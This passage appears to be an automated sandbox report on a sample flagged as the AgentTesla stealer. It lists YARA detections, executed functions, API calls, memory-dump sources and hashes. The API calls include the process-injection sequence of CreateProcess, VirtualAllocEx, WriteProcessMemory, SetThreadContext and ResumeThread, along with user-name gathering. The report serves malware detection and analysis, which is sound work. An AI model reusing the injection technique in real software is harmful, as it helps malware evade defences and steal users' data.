                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: anyname.exe PID: 6000 Parent PID: 3672 anyname.exeCOMMON

                                                          Executed Functions

                                                          Function 06BD6F60, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BD7196
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 274c22b013880cdb00e54eb72f6d0bb28ec224e99f65e71322e96033f1a221fc
                                                          • Instruction ID: f6a6a958c2a04089175d7e5ba0b2a98786b4bba5d9da43517d13d1fb1215a91d
                                                          • Opcode Fuzzy Hash: 274c22b013880cdb00e54eb72f6d0bb28ec224e99f65e71322e96033f1a221fc
                                                          • Instruction Fuzzy Hash: E0915CB1D00259CFDF60DFA4C8407EDBBB2FB49304F1485A9E808AB280EB759985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CD5375, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00CD5431
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 61cc7c4477fe68ecf1a4a4c71cbab739a01c4696b599785f30edc4e0c28ea389
                                                          • Instruction ID: 4430d629312bd7202f42451f0318b775f2606f16b670296cc0d9a74a5e1d1a91
                                                          • Opcode Fuzzy Hash: 61cc7c4477fe68ecf1a4a4c71cbab739a01c4696b599785f30edc4e0c28ea389
                                                          • Instruction Fuzzy Hash: 934114B1C00618CFDB24CFA6C9447CDBBB5BF49308F20846AD408BB251DB756986CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CD3E2C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00CD5431
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: ec62b947aaf5631826a537fa4922415abd61d27665046e0ad14089801632099f
                                                          • Instruction ID: 38068edaf8126be0c0cb6486835f8ac1a1415da7312569d356d63816da03a315
                                                          • Opcode Fuzzy Hash: ec62b947aaf5631826a537fa4922415abd61d27665046e0ad14089801632099f
                                                          • Instruction Fuzzy Hash: DD410471C00618CFDB24DFAAC8447DDBBB5BF48308F20856AD508BB251DBB56986CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD6CD8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BD6D68
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 9ed14cda1cc7a6fa2229b781ec7e133e720ca99d62c4e58dc70871613576a2a8
                                                          • Instruction ID: 060b44e07ec0398d57c00f0173c93b9b62b32760f0bcf5f30b3548e78963df27
                                                          • Opcode Fuzzy Hash: 9ed14cda1cc7a6fa2229b781ec7e133e720ca99d62c4e58dc70871613576a2a8
                                                          • Instruction Fuzzy Hash: BE2126B19003499FCF10CFA9D984BDEBBF5FF48314F14882AE919A7240D7789954CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD6DC8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BD6E48
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 2d8323532971524a5bbf557fca91dd3578ea0bd8161f581620c68d7fbac6b3b1
                                                          • Instruction ID: 1571de307a4cd8cce603ae6673bbefc30474161a6425647e84af52b4a26758b5
                                                          • Opcode Fuzzy Hash: 2d8323532971524a5bbf557fca91dd3578ea0bd8161f581620c68d7fbac6b3b1
                                                          • Instruction Fuzzy Hash: BB212AB19003499FCF10DFAAC8447DEBBF5FF48314F548429D518A7240D7759554DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD6B40, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 06BD6BBE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: f3b733063d65d92904f9958c47f8e00276a52f64c80584269a8b9af42ab9351e
                                                          • Instruction ID: 8b26568cab2c687af6bf6717eca721f90b9fa45b029544355d80c96112e72ce9
                                                          • Opcode Fuzzy Hash: f3b733063d65d92904f9958c47f8e00276a52f64c80584269a8b9af42ab9351e
                                                          • Instruction Fuzzy Hash: 3A2118B1D002098FDB50DFAAC4857EEBBF4EF48354F14882AD459A7240DB78A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CDD1E8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDE0E9,00000800,00000000,00000000), ref: 00CDE2FA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: daa8101f8cab313d530f9a50bd5c8d8bd2b3d916c40d7a4bb249c51d1f1048e4
                                                          • Instruction ID: 3a0c963047e6b2c8db8d5835aa2bb91431ba5d744b9153927e0b3117363af54c
                                                          • Opcode Fuzzy Hash: daa8101f8cab313d530f9a50bd5c8d8bd2b3d916c40d7a4bb249c51d1f1048e4
                                                          • Instruction Fuzzy Hash: 841114B69002499FDB10DF9AD444BEEFBF8EB88314F14882ED515AB300C375A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD6C18, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BD6C86
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6b3749521a3ac20f9a068e0b0d4e1951fb399e5ec782e3d2f6e4bd5201bb09c2
                                                          • Instruction ID: bb6407ecb9149332535c78195076512c8813d2f761e8fb961ff3a8689964c4b4
                                                          • Opcode Fuzzy Hash: 6b3749521a3ac20f9a068e0b0d4e1951fb399e5ec782e3d2f6e4bd5201bb09c2
                                                          • Instruction Fuzzy Hash: 7F1126B29002499FCF10DFAAC844BDEBBF9EB48324F14882AD515A7250D775A954CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD6A90, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: ffd5ac79b9072643c6bc08dca5aed7c26145499326bba59040929beccbeb9b96
                                                          • Instruction ID: c0543e60edc0fd2a4c8645413739aa9176f9363e125e2971f16ab406a23b5e0f
                                                          • Opcode Fuzzy Hash: ffd5ac79b9072643c6bc08dca5aed7c26145499326bba59040929beccbeb9b96
                                                          • Instruction Fuzzy Hash: E9110AB1D006498FDB10DFAAD4447DEFBF9EB88324F148829D455A7340D775A944CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CDE008, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDE06E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.338400681.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 4083715bc9694a2297e60e0e71ed13b72c8eb99b8ee15648378af65e77fa8717
                                                          • Instruction ID: 30e67a656920e8449febb2bc6872fa26559632af429ab4e96fe7b43cfe6fa761
                                                          • Opcode Fuzzy Hash: 4083715bc9694a2297e60e0e71ed13b72c8eb99b8ee15648378af65e77fa8717
                                                          • Instruction Fuzzy Hash: F71113B1D006498FDB20DF9AC444BDEFBF4EB88324F14852AD529A7300C3B5A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06BD97C8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,?,?,?), ref: 06BD9825
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.342914190.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 1584075085538cd4abae81196a997a8f57fe06f10c33f936b786105bcf6d3b40
                                                          • Instruction ID: f6a1631ccb43de47a399e5a84f532c20ce0ef98fe4706ee68b4a4f8a05ed3a15
                                                          • Opcode Fuzzy Hash: 1584075085538cd4abae81196a997a8f57fe06f10c33f936b786105bcf6d3b40
                                                          • Instruction Fuzzy Hash: 2F1115B5800349DFDB10DF9AD884BDEBBF8EB48324F10841AD414A7200C375A544CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: anyname.exe PID: 5608 Parent PID: 6000 anyname.exeCOMMON

                                                          Executed Functions

                                                          Function 067B16E8, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828830508.00000000067B0000.00000040.00000010.sdmp, Offset: 067B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b39f40823d23da0dade1f63cfe88b9bf0bd283314b7cdcb6c785bf425d66f38
                                                          • Instruction ID: a30b53cef6ed63d61dff8bd7987780c8d55d575474e82b575be83ee77e29b52c
                                                          • Opcode Fuzzy Hash: 6b39f40823d23da0dade1f63cfe88b9bf0bd283314b7cdcb6c785bf425d66f38
                                                          • Instruction Fuzzy Hash: A0F15830E00209CFDB54DFA5C868BADBBF1BF88314F54D569E419AB3A5DB70A945CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D3D50, Relevance: 1.8, APIs: 1, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 912e2788d0c85cb298d6d96e68a03f42a1707842afd638960daca30319147a90
                                                          • Instruction ID: 6fa3dd91722adef371d97c0451c7658f8d1d184f661fabed2872661e5677e12e
                                                          • Opcode Fuzzy Hash: 912e2788d0c85cb298d6d96e68a03f42a1707842afd638960daca30319147a90
                                                          • Instruction Fuzzy Hash: BAB16CB0A007068FCB14EF69D4946AEBBF5FF88204B14892ED51ADB761DF34E8058B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614FBF0, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ba831b1e673d675b0ae1db3cda1bb09edb311725dd6501cb2f6bb4dcc63f573f
                                                          • Instruction ID: d08021ee49b8ccc98ee987d5036b2eda3c13026afc89a1336b12b2e20614ffd8
                                                          • Opcode Fuzzy Hash: ba831b1e673d675b0ae1db3cda1bb09edb311725dd6501cb2f6bb4dcc63f573f
                                                          • Instruction Fuzzy Hash: 0D613D30E10209DFDB58EBB5D498BAEB7B2AF88305F518839D412A7394DF359846CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06145A94, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: aef59c2ea8f35ee26e8a549cd0f2d4a91a1955596f4a8cabbaefa40d7c778286
                                                          • Instruction ID: 1b1e97778a746574f72dbe8cfd9391065145d361428dec14ee4b6f2ed42d5deb
                                                          • Opcode Fuzzy Hash: aef59c2ea8f35ee26e8a549cd0f2d4a91a1955596f4a8cabbaefa40d7c778286
                                                          • Instruction Fuzzy Hash: 04510EB0E04258CFDB18DFA9C884B9EFBB1BF48314F15852AE815AB390D774A845CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 061494F8, Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <m
                                                          • API String ID: 0-1709939129
                                                          • Opcode ID: b692af63fe285f852dd7557dab28373bd73d59e6e6bf98180254704c02865a35
                                                          • Instruction ID: ee1f19d1f5c0854395ca304e28cc440a96866b4f31152f6ba40362ff7d9e786f
                                                          • Opcode Fuzzy Hash: b692af63fe285f852dd7557dab28373bd73d59e6e6bf98180254704c02865a35
                                                          • Instruction Fuzzy Hash: 32D14B74E10209CFCB54DFA8C484AEEFBF6EF88314F14895AE415AB351DB34A946CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D46A0, Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35fc10c828d6c2de6d69c9ebc14d1fb3949c03ac93c31964db607e38c0635e8c
                                                          • Instruction ID: 8bfaa2fd35ef94cf30e8eae1f11b1aed9e479569e159f7ba1226c811c93ae3e1
                                                          • Opcode Fuzzy Hash: 35fc10c828d6c2de6d69c9ebc14d1fb3949c03ac93c31964db607e38c0635e8c
                                                          • Instruction Fuzzy Hash: 1112B2B0421746CBE319CF65F94E1997FA1BF85318F508309F2611BAE1EBB9119ACF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06146C70, Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45d7ec085f019b8f4abceb054ce96557efbfdfcb709452d48da6b9d4c5c3e2d4
                                                          • Instruction ID: f493b7f5c23b8ca8363fc4e5c451fadb116fabba4fb0cde99ec3506928b4366f
                                                          • Opcode Fuzzy Hash: 45d7ec085f019b8f4abceb054ce96557efbfdfcb709452d48da6b9d4c5c3e2d4
                                                          • Instruction Fuzzy Hash: EBB18D70E00209CFDB50DFA9C8957DEBBF2AF89308F148529E859E7294DB349845CBC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06147540, Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 686fc9c2ac5150e4888e94c82e80ff6989792af7d0e76ed133a2b9783d3f8f87
                                                          • Instruction ID: 53a737edd69c307a11808c6beb13190aa31a90c2ea85d9db20b024ca4ee5d92e
                                                          • Opcode Fuzzy Hash: 686fc9c2ac5150e4888e94c82e80ff6989792af7d0e76ed133a2b9783d3f8f87
                                                          • Instruction Fuzzy Hash: B1B18B70E00209CFEB50DFA9D8957EDBBF2AF88314F148529D818EB394EB749845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06146928, Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa656fab8b9c048f399df57555067ba57b555fc4af653eae24bfe89b6450b2b4
                                                          • Instruction ID: 95e26ec1ac4df1311b71ae9ce80ff5d8e22aa102e3ff8fbe7ab80e59cb27bd51
                                                          • Opcode Fuzzy Hash: aa656fab8b9c048f399df57555067ba57b555fc4af653eae24bfe89b6450b2b4
                                                          • Instruction Fuzzy Hash: 70917B70E00619CFDF54DFA9C9907EEBBF2AF89318F24C529E409A7254DB749885CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D4630, Relevance: .2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33df73112b312fa977548b29ff526be75ddc2a7314f2daf534072422264cfa34
                                                          • Instruction ID: 4899b40428d8ba566a6932d43372da9f555c38bf550f691bfb33d5aee9f516ab
                                                          • Opcode Fuzzy Hash: 33df73112b312fa977548b29ff526be75ddc2a7314f2daf534072422264cfa34
                                                          • Instruction Fuzzy Hash: 9EC104B1821746CBD719CF65F94E1997FB1BF85318F108209F2612BAD1EBB9109ACF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D4690, Relevance: .2, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db75778e0606e8b07c3baf6c7ae3842108583d678fa101cdd1761ccc0ceff7fd
                                                          • Instruction ID: 9713ab1598d54551cfd743f453149a1971f9aadcf36ae698df451a0477d11b55
                                                          • Opcode Fuzzy Hash: db75778e0606e8b07c3baf6c7ae3842108583d678fa101cdd1761ccc0ceff7fd
                                                          • Instruction Fuzzy Hash: BAC104B1821745CBD719CF65F84E1997FB1BF85318F508209F2612BAD0EBB9109ACF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0530E238, Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aaf8a4165cfb86cb7cbc885c54c98761afaa13e82523e1392684b5f312d6444d
                                                          • Instruction ID: 7ba83b8efc0d4fd607e7edb5ec11a8ad7176e07d1c2c4a25a3115d1b3849848c
                                                          • Opcode Fuzzy Hash: aaf8a4165cfb86cb7cbc885c54c98761afaa13e82523e1392684b5f312d6444d
                                                          • Instruction Fuzzy Hash: 93618B70A00308DFDB14DFA9C454AAEBBFAFF89310F1088A9D415AB390DB35A941DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D691F, Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D69A0
                                                          • GetCurrentThread.KERNEL32 ref: 014D69DD
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6A1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6A73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 3f13d9c1fcf8298308c76a17adc55ef7de1f39c56e6df179ac575392b58363c2
                                                          • Instruction ID: aec9b25ab75dbba188ec73a17d65b04cfdf0d1cabe7167941eb8482c042a2b6f
                                                          • Opcode Fuzzy Hash: 3f13d9c1fcf8298308c76a17adc55ef7de1f39c56e6df179ac575392b58363c2
                                                          • Instruction Fuzzy Hash: B65187B09106498FEB14CFAAD548BDEBFF0EF49304F24859AE448A73A1CB745844CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D6940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 014D69A0
                                                          • GetCurrentThread.KERNEL32 ref: 014D69DD
                                                          • GetCurrentProcess.KERNEL32 ref: 014D6A1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 014D6A73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 87cb4ec535ecdf673c92e3dec14fd5ea62e0d9f4e878ebe6de0f17567df5312c
                                                          • Instruction ID: c51870e3e26324da7e769b167d90c6e453b1752327a4cba39ddc76944bf49947
                                                          • Opcode Fuzzy Hash: 87cb4ec535ecdf673c92e3dec14fd5ea62e0d9f4e878ebe6de0f17567df5312c
                                                          • Instruction Fuzzy Hash: FB5167B0A102498FEB14CFAAD5487DEBFF4EF48314F20856AE449A7360CB749844CF66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614B4F5, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 91de4ceb17f1be0e34e9202db3c33d7aa5f6db4c4e4cdb81f8b81331f90e65f6
                                                          • Instruction ID: 81f414f3d63407f51604e3e2a31d500a1266bd55ec43232fb4e38ac70958d313
                                                          • Opcode Fuzzy Hash: 91de4ceb17f1be0e34e9202db3c33d7aa5f6db4c4e4cdb81f8b81331f90e65f6
                                                          • Instruction Fuzzy Hash: 805130B0E042588FDB18DFA9C885BDEFBB1AF48314F14852AE815AB390D7749845CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614BEF8, Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: d6c926722fe67f5fe4dba0d12be319b3db80dc426569786aeb975b33de83c82c
                                                          • Instruction ID: 8518e44d5a070152d85c3052e487c9e67c802ace579f353f60e737607a5ab7f1
                                                          • Opcode Fuzzy Hash: d6c926722fe67f5fe4dba0d12be319b3db80dc426569786aeb975b33de83c82c
                                                          • Instruction Fuzzy Hash: 2541E075E063489FCB01DFA9D844BDABFF5EB49300F1584AAE808EB352D7349905CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614921C, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0614B63B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: b1a8a85fed500b1d30b80bb7d9d8a344c5310861b83ba62b3354068ff27c9374
                                                          • Instruction ID: f554c0cf05914d4f6b26c20faf1d1ad071110682d184140b814adacd04aa1eb9
                                                          • Opcode Fuzzy Hash: b1a8a85fed500b1d30b80bb7d9d8a344c5310861b83ba62b3354068ff27c9374
                                                          • Instruction Fuzzy Hash: 5C511FB0E042588FDB18DFA9C884B9EFBB1BF48314F15852AE815AB390D774A845CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05301568, Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 881a497d77beb6fd6c11637da770cd5ac1aa054ee0c3d478f8c3dba99ac53b96
                                                          • Instruction ID: f0c26ce03453845014b26ee1bfe14c53e9bef8b3a52dff3c932aa3dcbab7a9c1
                                                          • Opcode Fuzzy Hash: 881a497d77beb6fd6c11637da770cd5ac1aa054ee0c3d478f8c3dba99ac53b96
                                                          • Instruction Fuzzy Hash: FB412571E043858FCB00CFB9C8546EEBBF5AF89310F0985AAD409A7281DB749945CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D5084, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014D51A2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 87dfe87da3a8397173cdbf225b2f1eb03f2c25a0653d9397b0cc92c2f44556da
                                                          • Instruction ID: 647ade8da93010d79c9376dacd7f4c134834a4d1080b3c0ae097da5fd71b2123
                                                          • Opcode Fuzzy Hash: 87dfe87da3a8397173cdbf225b2f1eb03f2c25a0653d9397b0cc92c2f44556da
                                                          • Instruction Fuzzy Hash: B951BEB1D10248DFDF14CFAAC994ADEBBB5FF48314F64812AE819AB210DB749845CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D5090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
